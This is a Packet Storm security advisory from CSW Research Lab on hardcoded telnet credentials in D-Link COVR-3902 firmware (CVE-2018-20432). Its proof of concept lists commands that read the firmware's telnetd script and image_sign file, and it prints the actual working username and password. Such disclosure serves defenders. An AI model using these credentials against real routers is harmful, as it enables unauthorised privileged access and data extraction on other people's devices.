Lucene search
CSW Research LabPACKETSTORM:159058HistorySep 02, 2020 - 12:00 a.m.
COVR 3902 1.01B0 Hardcoded Credentials
2020-09-0200:00:00
CSW Research Lab
packetstormsecurity.com
216
0.687 Medium
EPSS
Percentile
98.0%
`*Title*: Telnet Hardcoded Credentials
*Summary*: The latest versions of the firmware have hardcoded default
credentials that can be exploited by an unauthenticated attacker to gain
privileged access to the firmware and to extract sensitive data
*Affected Firmware:* COVR-3902_REVA_ROUTER_FIRMWARE_v1.01B0
*CVE:* CVE-2018-20432
*Proof of Concept: *
Step 1: βcat ./etc/init0.d/S80telnetd.shβ to get a username
Step 2: βcat ./etc/config/image_signβ to get a password.
Username: Alphanetworks
Password: wrgac61_dlink.2015_dir883
----------
Cheers !!!
Team CSW Research Lab <http://www.cybersecurityworks.com>
`
Related
zdt
zdt
COVR 3902 1.01B0 Hardcoded Credentials Vulnerability
2020-09-04 00:00:00
cve
cve
CVE-2018-20432
2020-09-14 14:15:10
cvelist
cvelist
CVE-2018-20432
2020-09-14 13:41:04
nvd
nvd
CVE-2018-20432
2020-09-14 14:15:10
prion
prion
Hardcoded credentials
2020-09-14 14:15:00